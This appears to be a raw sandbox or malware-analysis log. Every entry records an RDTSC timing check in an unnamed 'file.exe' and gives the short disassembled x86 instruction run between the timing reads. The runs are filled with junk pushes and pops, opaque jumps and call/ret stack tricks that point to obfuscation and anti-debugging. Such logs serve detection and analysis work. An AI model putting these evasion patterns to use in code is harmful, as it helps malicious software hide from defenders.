Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EC9 second address: 1245EEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE58h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EEF second address: 1245EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EF5 second address: 1245EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124604E second address: 1246052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12461D6 second address: 12461EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE4Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12461EA second address: 12461EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246745 second address: 1246749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246749 second address: 1246765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F67787C0190h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246765 second address: 124678A instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F6778CEBE57h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120F806 second address: 120F80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12468BC second address: 12468C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12470E9 second address: 12470ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12470ED second address: 12470F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124716E second address: 124717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124717D second address: 12471F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1D6DDBC2h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F6778CEBE48h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D1AFEh] 0x0000002f mov esi, dword ptr [ebp+122D29F9h] 0x00000035 call 00007F6778CEBE49h 0x0000003a pushad 0x0000003b jmp 00007F6778CEBE4Dh 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jmp 00007F6778CEBE56h 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c push esi 0x0000004d ja 00007F6778CEBE46h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007F6778CEBE46h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12471F8 second address: 1247229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007F67787C0188h 0x00000012 pushad 0x00000013 je 00007F67787C0186h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jnl 00007F67787C0186h 0x00000029 popad 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247DE6 second address: 1247DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247DEA second address: 1247DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247F45 second address: 1247F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248087 second address: 1248092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12482F7 second address: 1248319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d ja 00007F6778CEBE46h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248319 second address: 1248323 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C018Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12491A8 second address: 12491AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A46B second address: 124A46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A46F second address: 124A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AE78 second address: 124AE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AE7E second address: 124AEE6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add esi, dword ptr [ebp+124613BDh] 0x00000015 push 00000000h 0x00000017 mov esi, dword ptr [ebp+122D2B61h] 0x0000001d mov esi, dword ptr [ebp+122D2AADh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F6778CEBE48h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f adc esi, 5FBA3C37h 0x00000045 jbe 00007F6778CEBE51h 0x0000004b jmp 00007F6778CEBE4Bh 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F6778CEBE4Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AEE6 second address: 124AEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B977 second address: 124B988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F6778CEBE4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B988 second address: 124B98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B98C second address: 124B996 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B996 second address: 124B9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push edi 0x00000008 sub edi, dword ptr [ebp+122D3443h] 0x0000000e pop edi 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 or esi, dword ptr [ebp+122D29A5h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F67787C0188h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov esi, ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B9D8 second address: 124B9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B9E1 second address: 124B9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D00B second address: 124D00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D00F second address: 124D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251E63 second address: 1251E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251E69 second address: 1251E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F67787C018Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250FEB second address: 1250FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D883 second address: 124D889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251F90 second address: 1251F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D889 second address: 124D89C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F67787C0198h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D89C second address: 124D8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1253F71 second address: 1253FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movsx edi, cx 0x00000009 push 00000000h 0x0000000b jmp 00007F67787C018Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F67787C0188h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2A05h] 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FB9 second address: 1254FC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FC7 second address: 1254FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FCB second address: 1255008 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f adc di, E252h 0x00000014 call 00007F6778CEBE4Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov dword ptr [ebp+1246FFACh], esi 0x00000023 push 00000000h 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D3827h], edi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1255008 second address: 125500C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125500C second address: 1255012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256FF1 second address: 12570A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F67787C0190h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F67787C0188h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D34F3h], esi 0x00000038 call 00007F67787C0193h 0x0000003d or bx, 9378h 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 mov ebx, dword ptr [ebp+122D19AAh] 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F67787C0188h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 js 00007F67787C0197h 0x0000006d jmp 00007F67787C0191h 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F67787C018Bh 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12570A8 second address: 12570AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12570AD second address: 12570B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1259154 second address: 1259158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120555C second address: 1205562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205562 second address: 1205581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6778CEBE46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12596AE second address: 12596B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12596B2 second address: 12596B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256251 second address: 1256257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256257 second address: 125625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B646 second address: 125B64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B64C second address: 125B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12598BC second address: 12598C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125D963 second address: 125D9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 je 00007F6778CEBE48h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F6778CEBE48h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D3182h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 pop edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125E8B5 second address: 125E927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F67787C0188h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F67787C018Dh 0x0000002b mov di, 75CFh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 jmp 00007F67787C0192h 0x00000037 push 00000000h 0x00000039 mov bl, F9h 0x0000003b xchg eax, esi 0x0000003c jo 00007F67787C018Eh 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F8BB second address: 125F8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F8BF second address: 125F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F67787C0198h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1261956 second address: 126195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126195A second address: 126196B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126476D second address: 126477D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F6778CEBE46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12662F5 second address: 12662F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12662F9 second address: 126630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126630B second address: 126630F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126630F second address: 1266321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007F6778CEBE56h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1269791 second address: 12697AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3E6 second address: 126C3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3F5 second address: 126C3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3F9 second address: 126C3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3FD second address: 126C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12701CB second address: 12701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F6778CEBE46h 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 jp 00007F6778CEBE71h 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F6778CEBE46h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127563F second address: 127565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C018Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127565C second address: 1275663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279839 second address: 1279851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F67787C0191h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A2A0 second address: 127A2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F6778CEBE48h 0x0000000e jnl 00007F6778CEBE56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A45D second address: 127A468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
